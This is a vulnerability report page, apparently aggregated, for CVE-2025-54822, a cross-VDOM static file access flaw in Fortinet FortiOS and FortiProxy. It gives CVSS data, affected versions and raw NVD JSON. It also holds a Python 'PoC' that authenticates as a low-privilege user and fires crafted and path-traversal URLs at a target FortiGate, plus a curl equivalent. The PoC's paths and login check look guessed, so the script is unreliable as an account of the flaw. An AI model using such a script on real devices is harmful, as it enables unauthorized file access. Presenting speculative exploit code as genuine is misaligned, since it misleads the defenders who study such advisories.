Security Vulnerability Report
中文
CVE-2025-54822 CVSS 4.3 MEDIUM

CVE-2025-54822

Published: 2025-10-14 16:15:39
Last Modified: 2026-01-14 10:16:06
Source: [email protected]

Description

An improper authorization vulnerability [CWE-285] vulnerability in Fortinet FortiOS 7.4.0 through 7.4.1, FortiOS 7.2.0 through 7.2.8, FortiOS 7.0.0 through 7.0.11, FortiProxy 7.4.0 through 7.4.8, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiProxy 2.0 all versions allows an authenticated attacker to access static files of others VDOMs via crafted HTTP or HTTPS requests.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* - VULNERABLE
FortiOS 7.4.0 - 7.4.1
FortiOS 7.2.0 - 7.2.8
FortiOS 7.0.0 - 7.0.11
FortiProxy 7.4.0 - 7.4.8
FortiProxy 7.2 全版本
FortiProxy 7.0 全版本
FortiProxy 2.0 全版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54822 - Fortinet FortiOS/FortiProxy VDOM Static File Access PoC # Vulnerability: Improper Authorization (CWE-285) - Cross-VDOM static file access # Author: Security Researcher # Note: Requires valid low-privilege authenticated session import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET_HOST = "https://<target-fortigate-ip>" USERNAME = "low_privilege_user" PASSWORD = "password123" TARGET_VDOM = "root" # Target VDOM to access (e.g., "root", "vdom1", etc.) session = requests.Session() session.verify = False # Step 1: Authenticate to the FortiGate device login_url = f"{TARGET_HOST}/logincheck" login_data = { "username": USERNAME, "secretkey": PASSWORD } response = session.post(login_url, data=login_data) if response.status_code == 200 and "FORTINET" not in response.text: print("[+] Authentication successful") else: print("[-] Authentication failed") exit(1) # Step 2: Exploit VDOM static file access via crafted HTTP request # The vulnerability allows accessing static files of other VDOMs # by manipulating the request path or VDOM context # Method 1: Direct path manipulation to target VDOM static files exploit_urls = [ f"{TARGET_HOST}/static/{TARGET_VDOM}/css/style.css", f"{TARGET_HOST}/static/{TARGET_VDOM}/js/main.js", f"{TARGET_HOST}/favicon.ico?vdom={TARGET_VDOM}", f"{TARGET_HOST}/{TARGET_VDOM}/static/../static/config.txt", f"{TARGET_HOST}/ng/fortiview/../static/{TARGET_VDOM}/index.html", ] for url in exploit_urls: try: resp = session.get(url, timeout=10) if resp.status_code == 200 and len(resp.content) > 0: print(f"[+] Successfully accessed: {url}") print(f" Content-Length: {len(resp.content)}") print(f" Preview: {resp.text[:200]}") else: print(f"[-] Access denied or empty: {url} (Status: {resp.status_code})") except Exception as e: print(f"[-] Error accessing {url}: {e}") # Method 2: Using curl equivalent # curl -k -b "APISESSIONID=<session_cookie>" \ # "https://<target>/static/<target_vdom>/path/to/static/file" print("\n[*] PoC execution completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54822", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:39.180", "lastModified": "2026-01-14T10:16:05.973", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authorization vulnerability [CWE-285] vulnerability in Fortinet FortiOS 7.4.0 through 7.4.1, FortiOS 7.2.0 through 7.2.8, FortiOS 7.0.0 through 7.0.11, FortiProxy 7.4.0 through 7.4.8, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiProxy 2.0 all versions allows an authenticated attacker to access static files of others VDOMs via crafted HTTP or HTTPS requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.2.9", "matchCriteriaId": "AC7395B0-2864-49E3-8B70-935A17EF3162"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.2", "matchCriteriaId": "4316C2EA-3D6E-4A0C-B81D-ADCE040E03E0"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "BB3C0418-E314-45E0-A706-A9B45231ED1E"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-684", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.